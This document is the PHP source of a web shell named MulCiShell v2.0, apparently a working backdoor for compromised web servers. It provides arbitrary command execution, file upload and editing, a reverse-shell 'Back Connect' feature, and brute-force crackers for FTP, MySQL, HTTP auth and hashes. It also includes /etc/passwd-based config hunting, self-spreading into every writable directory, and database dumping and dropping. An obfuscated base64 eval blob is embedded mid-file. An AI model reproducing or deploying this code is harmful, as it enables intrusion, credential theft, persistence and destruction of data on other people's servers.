function togglecheck() { var cb=document.forms[0].check for (i in cb) { cb[i].checked=(cb[i].checked)?false:true; } } "; switch($access_control) #Break statements intentionally ommited { case 3: $ip_allwd=false; foreach($allowed_addrs as $addr) { if($addr==$_SERVER['REMOTE_ADDR']) {$ip_allwd=true; break;} if(!$ip_allwd) exit; } case 2: if(!isset($_SERVER['PHP_AUTH_USER'])||$_SERVER['PHP_AUTH_USER']!=$md5_user||$_SERVER['PHP_AUTH_PW']!=$md5_pass) { header("WWW-Authenticate: Basic Realm=\"Restricted area\""); header("HTTP/1.1 401 Unauthorized"); echo "Wrong username/password"; exit; } case 1: if($_SERVER['HTTP_USER_AGENT']!=$user_agent) exit; } if($id) { $s=strpos($id,"(",0)+1; $e=strpos($id,")",$s); $idval=substr($id,$s,$e-$s); } $disable=@ini_get("disable_functions"); if(empty($disable)) $disable="None"; function rm_rep($dir,&$success,&$fail) { @$dh=opendir($dir); if(is_resource($dh)) { while((@$rm=readdir($dh))) { if($rm=='.' || $rm=='..') continue; if(is_dir($dir.'/'.$rm)) {echo "Deleting dir $dir/$rm...
"; rm_rep($dir.'/'.$rm,$success,$fail); continue;} if(@unlink($dir.'/'.$rm)) {$success++;echo "Deleted $rm...
";} else {$fail++; echo "Failed to delete $rm
";} } @closedir($dh); } else echo "Failed to open dir $dir
"; } function chmod_rep($dir,&$success,&$fail,$mod_value) { @$dh=opendir($dir); if(is_resource($dh)) { while((@$ch=readdir($dh))) { if($ch=='.' || $ch=='..') continue; if(is_dir($dir.'/'.$ch)) {echo "Changing file modes in dir $dir/$ch...
"; chmod_rep($dir.'/'.$ch,$success,$fail,$mod_value); continue;} if(@chmod($dir.'/'.$ch,$mod_value)) {$success++;echo "Changed mode for $ch...
";} else {$fail++; echo "Failed to chmod $rm
";} } @closedir($dh); } else echo "Failed to open dir $dir
"; } #Complete these functions function spread_self($user,&$c=0,$d=0) { if(!$d) $dir="/home/$user/public_html/"; else $dir=$d; if(is_dir($dir)&&is_writable($dir)) { copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php'); echo "[+] Shell copied to $dir.$f./mshell.php
"; $c++; } if(@$dh=opendir($dir)) echo "[-] Failed to open dir $dir
"; while((@$f=readdir($dh))) { if($f!="."&&$f!="..") { if(@is_dir($dir.$f)) { echo "[+] Spreading to dir $dir
"; if(@is_writable($dir.$f)) { copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php'); echo "[+] Shell copied to $dir.$f./mshell.php
"; $c++; } $c+=spread_self($user,$c,$dir.$f.'/'); } } } } function copy_rep($dir,&$c) { } function backup_site() { if(!isset($_POST['busite'])) { echo "
The following tool will attempt to retrieve every file from the specified dir (including child dirs).
If successful, you will be prompted for a site backup download.
Note: Only readable files will be downloaded. Images and executables will be discarded. This tool should only be used in scenarios in which you have to quickly retrieve a site's source.
"; } } function infect_rep($dir,&$success,&$fail) { } function copy_dir($dir,$new_dir) { } ################################## function execmd($cmd,$d_functions="None") { if($d_functions=="None") {$ret=passthru($cmd); return $ret;} $funcs=array("shell_exec","exec","passthru","system","popen","proc_open"); $d_functions=str_replace(" ","",$d_functions); $dis_funcs=explode(",",$d_functions); foreach($funcs as $safe) { if(!in_array($safe,$dis_funcs)) { if($safe=="exec") { $ret=@exec($cmd); $ret=join("\n",$ret); return $ret; } elseif($safe=="system") { $ret=@system($cmd); return $ret; } elseif($safe=="passthru") { $ret=@passthru($cmd); return $ret; } elseif($safe=="shell_exec") { $ret=@shell_exec($cmd); return $ret; } elseif($safe=="popen") { $ret=@popen("$cmd",'r'); if(is_resource($ret)) { while(@!feof($ret)) $read.=@fgets($ret); @pclose($ret); return $read; } return -1; } elseif($safe="proc_open") { $cmdpipe=array( 0=>array('pipe','r'), 1=>array('pipe','w') ); $resource=@proc_open($cmd,$cmdpipe,$pipes); if(@is_resource($resource)) { while(@!feof($pipes[1])) $ret.=@fgets($pipes[1]); @fclose($pipes[1]); @proc_close($resource); return $ret; } return -1; } } } return -1; } $links=array("Enumerate"=>"$self?act=enum","Files"=>"$self?act=files","Domains"=>"$self?act=domains","MySQL"=>"$self?act=sql","Encoder"=>"$self?act=encode", "Sec. Info"=>"$self?act=sec","Cracker"=>"$self?act=bf", "Bypassers"=>"$self?act=bypass","Tools"=>"$self?act=tools","Databases"=>"$self?act=dbs","Backdoor Host"=>"$self?act=bh","Back Connect"=>"$self?act=backc","Spread Shell"=>"$self?act=spread","Kill Shell"=>"$self?act=kill"); echo "MulCiShell v2.0 - Edited By KingDefacer"; switch($_SESSION['theme']) { case 'green': echo " "; break; case 'dark': echo ""; break; default: echo " "; break; } echo base64_decode("PGNlbnRlcjxpbWcgc3JjPSdodHRwOi8vaW1nNTI5LmltYWdlc2hhY2sudXMvaW1nNTI5LzExNjYv bWlsY2lzaGVsbGxrNi5wbmcnPjwvY2VudGVyPg=="); echo "
Server IPYour IPDisk spaceSafe_mode?Open_BaseDir?SystemServer softwareDisabled functionsIDShell location
$serv$addr$space of $total$safe_mode$open_basedir$uname$soft$disable$idval".CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF'])."

"; foreach($links as $val=>$addr) echo "[ $val ]"; echo "

"; if(isset($_POST['encryption'])) { $e=$_POST['encrypt']; echo "


Input:
"; } if(isset($_POST['dogetfile'])) execmd("wget $_POST[wgetfile]",$disable); if(isset($_POST['doUpload'])) { $dir=$_POST['u_location']; $name=$_FILES['u_file']['name']; switch($_FILES['u_file']['error']) { case 0: if(@move_uploaded_file($_FILES['u_file']['tmp_name'],$dir.'/'.$name)) echo "File uploaded successfully
"; else echo "Failed to upload file!"; } } if(isset($_POST['massfiles'])) { $fail=0; $success=0; switch($_POST['fileaction']) { case 'Infect': #Nothing special here, just kick them while they're down foreach($_POST['files'] as $file) { $ext=strrchr($file,'.'); if($ext!=".php") continue; @$fh=fopen($file,'a'); if(@is_resource($fh)) { $success++; @fwrite($fh,""); @fclose($fh); } else $fail++; } echo "Successfully infected $success files; failed to infect $fail files
Exploit files as such: file.php?e=php code"; break; case 'Delete': foreach($_POST['files'] as $file) { if(is_dir($file)) rm_rep($file,$success,$fail); else { if(@unlink(CleanDir($file))) { echo "File $file deleted
"; $success++; } else { echo "Failed to delete file $file
"; $fail++; } } } echo "Total files deleted: $success; failed to delete $fail files
"; break; case 'Chmod': foreach($_POST['files'] as $file) { if(is_dir($file)) chmod_rep($file,$success,$fail,$_POST['cmodv']); if(@chmod(CleanDir($file),$_POST['cmodv'])) { echo "Changed mode for $file
"; $success++; } else { echo "Failed to change mode for $file
"; $fail++; } } echo "Total files modes modified: $success; failed to chmod $fail files
"; break; } } if(isset($_POST['docrack'])) { $con=true; $show=0; $list=@fopen($_FILES['wordlist']['tmp_name'],'r'); if(is_resource($list)) { if(isset($_POST['ftpcrack'])) { echo "Bruting $_POST[ftp_user]@$_POST[ftp_host]...
"; if(!empty($_POST['ftp_port'])) $port=$_POST['ftp_port']; else $port='3306'; if(empty($_POST['ftp_timeout'])||!preg_match("/^[0-9]$/",$_POST['ftp_timeout'])) $time=3; else $time=$_POST['ftp_timeout']; @$ftp=ftp_connect($_POST['ftp_host'],$port,$time); if(!$ftp) $con=false; if($con) { $show++; while(!feof($list)) { @$pass=fgets($list); if(ftp_login($ftp,$_POST['ftp_user'],trim($pass))) { echo "Password found! Password for $_POST[ftp_user] is $pass
"; @ftp_close($ftp); break; } if($show==10000){echo "Trying pass $pass...
"; $show=0;} } } else echo "Failed to connect!
"; } elseif(isset($_POST['remote_login'])) { //if(!function_exists("jitghjytiojho")) die("cURL support has to be enabled."); /* $ch=curl_init($_POST['remote_login_target']); curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_POST,1); curl_setopt($ch,CURLOPT_POSTFIELDS,''); curl_exec($ch); */ if(preg_match("/^http:\/\/+/",$_POST['remote_login_target'])) die("Do not include http:// in the target URL."); $path=explode('/',$_POST['remote_login_target']); $site=$path[0]; for($i=1;$i"; break; } if($show===10000) { $show=0; echo "Trying pass $pass...
"; } } echo "Complete
"; } elseif(isset($_POST['mysqlcrack'])) { $host=$_POST['mysql_host']; $user=$_POST['mysql_user']; if(!empty($_POST['mysql_port'])) $host.=":$_POST[mysql_port]"; while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(@mysql_connect($host,$user,$pass)) { echo "Password found! Password for $user is $pass
"; break; } if($show==10000) { echo "Trying $pass...
"; $show=0; continue; } } } elseif(isset($_POST['authcrack'])) { $arr=explode('/',$_POST['auth_url']); $con_url=$arr[0]; if(empty($_POST['auth_url'])) die("Enter a target first..."); for($i=1;$i5000) {$show=0; echo $pass;} $encode=base64_encode(trim($_POST['auth_user']).':'.$pass); $header="GET $path HTTP/1.1\r\n"; $header.="Host: $con_url\r\n"; $header.="Authorization: Basic $encode\r\n"; $header.="Connection: Close\r\n\r\n"; fputs($conn_url,$header,strlen($header)); $tmp++; while(!feof($conn_url)) { $tmp=fgets($conn_url); if(preg_match("/HTTP\/\d+\.\d+ 200+/",$tmp)) { echo "Password found! Password=$pass

"; break 2; } } } } echo "Done
"; } elseif(isset($_POST['md5crack'])) { if(empty($_POST['md5hash'])) die("Enter a hash before attempting to crack one ;)"); $md5=trim($_POST['md5hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(md5($pass)===$md5) { echo "Password found! Plaintext for $md5 is $pass
"; break; } if($show==10000) { echo "Trying $pass...
"; $show=0; continue; } } } elseif(isset($_POST['sha1crack'])) { if(empty($_POST['sha1hash'])) die("Enter a hash before attempting to crack one ;)"); $sha1=trim($_POST['sha1hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(sha1($pass)===$sha1) { echo "Password found! Plaintext for $sha1 is $pass
"; break; } if($show==10000) { echo "Trying $pass...
"; $show=0; continue; } } } } @fclose($list); } if(isset($_POST['port_scan'])) { switch($_POST['type']) { case 'php': extract($_POST); while($sport<=$eport) { echo "Trying port $sport"; if(@fsockopen($host,$sport,$errno,$errstr,2)) echo "Port $sport open
"; $sport++; } break; default: echo "Invalid request
"; } } if(isset($_POST['find_forums'])) { echo "
[ Forum locator ]


"; $found=0; global $int_paths; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!"); while(!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html"; if(@is_dir($path)) { foreach($int_paths as $forum_path) { $full_path=$path."/$forum_path/"; if(@is_dir($full_path)) { echo "[+] Forum found: Path: $full_path
"; $found++; continue; } } } } echo "Scan complete. Found $found forums

"; } function find_configs($path,&$found) { if(@file_exists($path.'config.php')) { echo "Found config file: $path"."config.php
"; $found++; } @$dh=opendir($path); while((@$file=readdir($dh))) if(is_dir($file)&&$file!='.'&&$file!='..') find_configs($path.$file.'/',$found); @closedir($dh); } if(isset($_POST['find_configs'])) { $found=0; echo "
[ Config locator ]


"; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!"); while(!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html/"; find_configs($path,$found); } @fclose($fp); echo "Scan complete. Found $found configs

"; } if(isset($_POST['execmd'])) {echo "
";} if(isset($_POST['execphp'])) {echo "
";} if(isset($_POST['cnewfile'])) { if(@fopen($_POST['newfile'],'w')) echo "File created
"; else echo "Failed to create file
"; } if(isset($_POST['cnewdir'])) { if(@mkdir($_POST['newdir'])) echo "Directory created
"; else echo "Failed to create directory
"; } if(isset($_POST['doeditfile'])) FileEditor(); switch($_GET['act']) { case 'backc': if(!isset($_POST['backconnip'])) { echo "
Address: Port:

Listen with netcat by executing 'nc -l -n -v -p 1337'

Note: Be sure to foward your port first
"; } else { if(empty($_POST['backconnport'])||empty($_POST['backconnip'])) die("Specify a host/port"); if(is_writable(".")) { @$fh=fopen(getcwd()."/bc.pl",'w'); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...
"; execmd("perl ".getcwd()."/bc.pl $_POST[backconnip] $_POST[backconnport]",$disable); if(!@unlink(getcwd()."/bc.pl")) echo "Warning: Failed to delete reverse-connection program
"; } else { @$fh=fopen("/tmp/bc.pl","w"); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...
"; if(!@unlink("/tmp/bc.pl")) echo "

Warning: Failed to delete reverse-connection program<

/font>
"; } } break; case 'dbs': database_tools(); break; case 'sql': SQLLogin(); break; case 'sqledit': SQLEditor(); break; case 'download': SQLDownload(); break; case 'tools': show_tools(); break; case 'logout': $_SESSION=array(); session_destroy(); echo "Logged out from MySQL.
"; break; case 'f': FileEditor(); break; case 'encode':Encoder(); break; case 'bypass':security_bypass(); break; case 'bf':brute_force(); break; case 'bh': BackDoor(); break; case 'spread': if(!isset($_POST['spread_shell'])) { echo "
This tool will attempt to copy the shell into every writable directory on the server, in order to allow access maintaining.
Passwd file:
"; } else { $s=0; @$file=fopen($_POST['passwd_file'],'r'); if(is_resource($file)) { while(!feof($file)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($file)); spread_self($user,$s); } @fclose($file); } echo ($s>0)?"Spread complete. Successfully managed to spread the shell $s times
":"Failed to spread the shell.
"; } break; case 'domains': $header="GET /search/reverse-ip-domain.php?q=$_SERVER[HTTP_HOST] HTTP/1.0\r\n"; $header.="Host: searchy.protecus.de\r\n"; $header.="Connection: Close\r\n\r\n"; $domain_handle=fsockopen("searchy.protecus.de",80); @fputs($domain_handle,$header,strlen($header)); while(@!feof($domain_handle)) { echo fgets($domain_handle); } break; case 'kill': if(!isset($_POST['justkill'])) { echo "
Do you *really* want to kill the shell?

"; } else { if(@unlink(basename($_SERVER['PHP_SELF']))) echo "Shell deleted.
"; else echo "Failed to delete shell
"; } break; case 'sec': $mysql_on=function_exists("mysql_connect")?"ON":"OFF"; $curl_on=function_exists("curl_init")?"ON":"OFF"; $magic_quotes_on=get_magic_quotes_gpc()?"ON":"OFF"; $register_globals_on=(@ini_get('register_globals')=='')?"OFF":"ON"; $include_on=(@ini_get('allow_url_include')=='')?"Disabled":"Enabled"; $etc_passwd=@is_readable("/etc/passwd")?"Yes":"No"; $ver=phpversion(); echo "
Security overview
"; "
PHP VersionSafe modeOpen_BasedirMagic_QuotesRegister globals Remote includesRead /etc/passwd?MySQLcURL
$ver$safe_mode$open_basedir$magic_quotes_on$register_globals_on$include_on $etc_passwd$mysql_on$curl_on
"; break; case 'enum': $windows=0; $path=CleanDir(getcwd()); if(!eregi("Linux",php_uname())) {$windows=1;} if(!$windows) { $spath=str_replace("/home/","$serv/~",$path); $spath=str_replace("/public_html/","/",$spath); $URL="http://$spath/".basename($_SERVER['PHP_SELF']); echo "Enumerated shell link: $URL"; } else echo "Enumeration failed
"; break; } echo "
"; if(isset($_POST['sqlquery'])) { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_POST['db'])) @mysql_select_db($_POST['db']); $post_query=@mysql_query(stripslashes($_POST['sqlquery'])) or die(mysql_error()); $affected=@mysql_num_rows($post_query); echo "Affected rows: $affected
"; } } $dirs=array(); $files=array(); if(!isset($_GET['d'])) {$d=CleanDir(realpath(getcwd())); $dh=@opendir(".") or die("Permission denied!");} else {$d=CleanDir($_GET['d']); $dh=@opendir($_GET['d']) or die("Permission denied!");} $current=explode("/",$d); echo "
Current location: ";for($p=0;$p$current[$p]/"; } echo "
"; if(isset($_GET['d'])) echo ""; else echo ""; echo ""; while(($f=@readdir($dh))) { if(@is_dir($d.'/'.$f)) $dirs[]=$f; else $files[]=$f; } asort($dirs); asort($files); @closedir($dh); foreach($dirs as $f) { @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; $size="DIR"; @$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),2); @$write=is_writable($d.'/'.$f)?"Yes":"No"; $mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); if($f==".") {continue;} elseif($f=="..") { $f=Trail($d.'/'.$f); echo ""; continue; } echo ""; } foreach($files as $f) { @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; @$size=TrueSize(filesize($d.'/'.$f)); @$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),3); @$write=is_writable($d.'/'.$f)?"Yes":"No"; @$mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); echo ""; } echo "
FileSizeOwner/groupPermsWritableModifiedAction
..$size$own/$grp$ch$write$modNone
$f$size$own/$grp$ch$write$mod
$f$size$own/$grp$ch$write$mod

With checked file(s):
"; function SQLLogin() { global $self; if(!isset($_SESSION['log'])&&!isset($_POST['mconnect'])) { echo "
Host: Username: Password: Port:
"; } elseif(!isset($_SESSION['log'])&&isset($_POST['mconnect'])) { extract($_POST); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { $_SESSION['muser']=$muser; $_SESSION['mhost']=$mhost; $_SESSION['mpass']=$mpass; $_SESSION['mport']=$mport; $_SESSION['log']=true; header("Location: $self?act=sqledit"); } else echo "Failed to login with $muser@$mhost!
"; } else { header("Location: $self?act=sqledit"); } } function SQLEditor() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { echo "Logged in as $muser@$mhost [Logout]
"; echo "
Quick SQL query:
"; echo "


"; if(isset($_POST['sql_list_proc'])) { $res=mysql_list_processes(); echo ""; while($r=mysql_fetch_assoc($res)) echo ""; mysql_free_result($res); echo "
Proc IDHostDBCommandTime
$r[Id]$r[Host]$r[db]$r[Command]$r[Time]

"; } if(!isset($_GET['db'])) { if(isset($_POST['dbc'])) db_create(); if(isset($_GET['dropdb'])) SQLDrop(); echo ""; $all_your_base=mysql_list_dbs($conn); while($your_base=mysql_fetch_assoc($all_your_base)) { $tbl=mysql_query("SHOW TABLES FROM $your_base[Database]"); $tbl_count=mysql_num_rows($tbl); echo ""; } echo "
DatabaseTable countDownloadDrop
$your_base[Database]$tbl_countDownloadDrop

New database name:

"; } elseif(isset($_GET['db'])&&!isset($_GET['tbl'])) { if(isset($_POST['tblc'])) table_create(); if(isset($_GET['droptbl'])) SQLDrop(); echo ""; $tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($tblc=mysql_fetch_array($tables)) { $fCount=mysql_query("SHOW COLUMNS FROM $_GET[db].$tblc[0]"); $fc=mysql_num_rows($fCount); echo ""; } echo "
TableColumn countDumpDrop
$tblc[0]$fcDumpDrop

Create new table:
"; } elseif(isset($_GET['field'])&&isset($_POST['sqlsave'])) { $discard_values=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'"); $values=mysql_fetch_assoc($discard_values); $keys=array_keys($values); $values=array(); foreach($_POST as $k=>$v) if(in_array($k,$keys)) $values[]=$v; $query="UPDATE $_GET[db].$_GET[tbl] SET "; for($y=0;$yTable updated!
"; echo "Go back

"; } elseif(isset($_GET['field'])&&isset($_GET['v'])&&!isset($_GET['del'])) { echo "
"; $sql_fields=array(); $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($field=mysql_fetch_assoc($fields)) $sql_fields[]=$field['Field']; $data=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'"); $d_piece=mysql_fetch_assoc($data); for($m=0;$m
"; } echo "
"; } elseif(isset($_GET['db'])&&isset($_GET['tbl'])) { if(isset($_GET['insert'])) SQLInsert(); if(isset($_GET['field'])&&isset($_GET['v'])&&isset($_GET['del'])) { echo "
"; if(@mysql_query("DELETE FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]=$_GET[v]")) echo "Row deleted
"; else echo "Failed to delete row
"; echo "
"; } echo "
[Insert new row]
"; echo ""; $cols=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); $fields=array(); while($col=mysql_fetch_assoc($cols)) { array_push($fields,$col['Field']); echo ""; } echo ""; if(isset($_GET['s'])&&is_numeric($_GET['s'])) {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT $_GET[s], 250");} else {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT 0, 250");} while($select=mysql_fetch_row($selector)) { echo ""; for($i=0;$i".htmlspecialchars($select[$i]).""; } echo ""; echo ""; } echo "
$col[Field]
EditDelete
"; echo ""; if(isset($_GET['s'])) { $prev=intval($_GET['s'])-250; $next=intval($_GET['s'])+250; if($_GET['s']>0) echo ""; if(mysql_num_rows($selector)>249) echo ""; } else echo "
Next
"; echo "
PreviousNext
"; } else { $_SESSION=array(); session_destroy(); header("Location: $self?act=sql"); } } } function SQLDownload() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_GET['db'])&&!isset($_GET['tbl'])) { $tables=array(); $dump_file="##################SQL Database dump####################\n"; $dump_file.="######################Dumped by: MulciShell v0.2 - Edited By KingDefacer#####################\n\n"; $get_tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($current_table=mysql_fetch_array($get_tables)) $tables[]=$current_table[0]; foreach($tables as $table_dump) { $data_selection=mysql_query("SELECT * FROM $_GET[db].$table_dump"); while($current_data=mysql_fetch_assoc($data_selection)) { $fields=implode("`, `", array_keys($current_data)); $values=implode("`, `",array_values($current_data)); $dump_file.="INSERT INTO `$table_dump` ($fields) VALUES ($values); "; } } } elseif(isset($_GET['db'])&&isset($_GET['tbl'])) { $dump_file="##################SQL Database dump####################\n"; $dump_file.="######################Dumped by: MulciShell v0.2 - Edited By KingDefacer#####################\n"; $table_dump=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl]"); while($table_data=mysql_fetch_assoc($table_dump)) { $fields=implode("`, `",array_keys($table_data)); $values=implode("`, `",array_values($table_data)); $dump_file.="INSERT INTO `$_GET[db].$_GET[tbl]` ($fields) VALUES ($values`)\n"; } } else { echo "Invalid!"; } } $dump_file.="########################################################################################"; if(!isset($_GET['tbl'])) $file_name="$_GET[db]"."_DUMP.sql"; else $file_name="$_GET[db]"."_$_GET[tbl]"."_DUMP.sql"; ob_get_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($dump_file)); header("Content-disposition: attachment; filename=$file_name;"); echo $dump_file; exit; }$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==')); function SqlInsert() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(!isset($_POST['sql_insert'])) { echo "
"; $sql_fields=array(); $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field']; for($s=0;$s
"; echo "
"; } else { $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field']; $values=array(); $keys=array(); $query="INSERT INTO $_GET[db].$_GET[tbl] ("; foreach($_POST as $k=>$v) { if(in_array($k,$sql_fields)&&!empty($v)) { $values[]=$v; $keys[]=$k; } } for($k=0;$k"; if(@mysql_query($query)) echo "Row inserted
"; else echo "Failed to insert row
"; echo ""; } } } function SQLDrop() { echo "
"; extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(!isset($_GET['droptbl'])) { $query="DROP DATABASE $_GET[dropdb]"; if(@mysql_query($query)) echo "Database $_GET[dropdb] has been dropped
"; else echo "Failed to drop database $_GET[dropdb]
"; } elseif(isset($_GET['db'])&&isset($_GET['droptbl'])) { $query="DELETE FROM $_GET[db].$_GET[droptbl]"; if(@mysql_query($query)) echo "Table $_GET[droptbl] has been dropped
"; else echo "Failed to drop table $_GET[droptbl]
"; } else { echo "Invalid request
"; } } else echo "Failed to connect
"; echo "
"; } function db_create() { echo "
"; if(isset($_POST['db_name']) && !empty($_POST['db_name'])) { extract($_SESSION); @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(@mysql_query("CREATE DATABASE $_POST[db_name]")) echo "Status: Database $_POST[db_name] created!"; else echo "Failed to create database $_POST[db_name]
"; } else echo "Failed to connect
"; } else echo "Enter a DB name
"; echo ""; } function table_create() { echo "
"; if(isset($_POST['table_name'])&&!empty($_POST['table_name'])) { extract($_SESSION); @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { @mysql_select_db($_POST['db_current']); if(@mysql_query("CREATE TABLE `$_POST[table_name]` (`TEMPORARY` TEXT NOT NULL)")) echo "Status: Table $_POST[table_name] created!"; else echo "Failed to create table $_POST[table_name]"; } else echo "Failed to connect!
"; } else echo "Enter a table name
"; echo "
"; } function FileEditor() { if(isset($_GET['file'])) $file=$_GET['file']; elseif(isset($_POST['nfile'])) $file=$_POST['nfile']; elseif(isset($_POST['editfile'])) $file=$_POST['editfile']; if(@!file_exists($file)) die("Permission denied!"); if(isset($_POST['dfile'])) { @$fh=fopen($file,'r'); @$buffer=fread($fh,filesize($file)); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($buffer)); header("Content-disposition: attachment; filename=".basename($file).';'); @ob_get_clean(); echo $buffer; @fclose($fh); } elseif(isset($_POST['delfile'])) { if(!unlink(str_replace("//","/",$file))) echo "Failed to delete file!
"; else echo "File deleted
"; } elseif(isset($_POST['sfile'])) { $fh=@fopen($file,'w') or die("Failed to open file for editing!"); @fwrite($fh,stripslashes($_POST['file_contents']),strlen($_POST['file_contents'])); echo "File saved!"; @fclose($fh); } else { $fh=@fopen($file,'r'); echo "
File to edit:

"; echo "

"; echo "
"; @fclose($fh); } } function security_bypass() { if(isset($_POST['curl_bypass'])) { $ch=curl_init("file://$_POST[file_bypass]"); curl_setopt($ch,CURLOPT_HEADERS,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $file_out=curl_exec($ch); curl_close($ch); echo "

"; } elseif(isset($_POST['tmp_bypass'])) { tempnam("/home/",$_POST['file_passwd']); } elseif(isset($_POST['copy_bypass'])) { if(@copy($_POST['file_bypass'],$_POST['dest'])) { echo "File successfully copied!
"; @$fh=fopen($_POST['dest'],'r'); echo "

"; @fclose($fh); } else echo "Failed to copy file
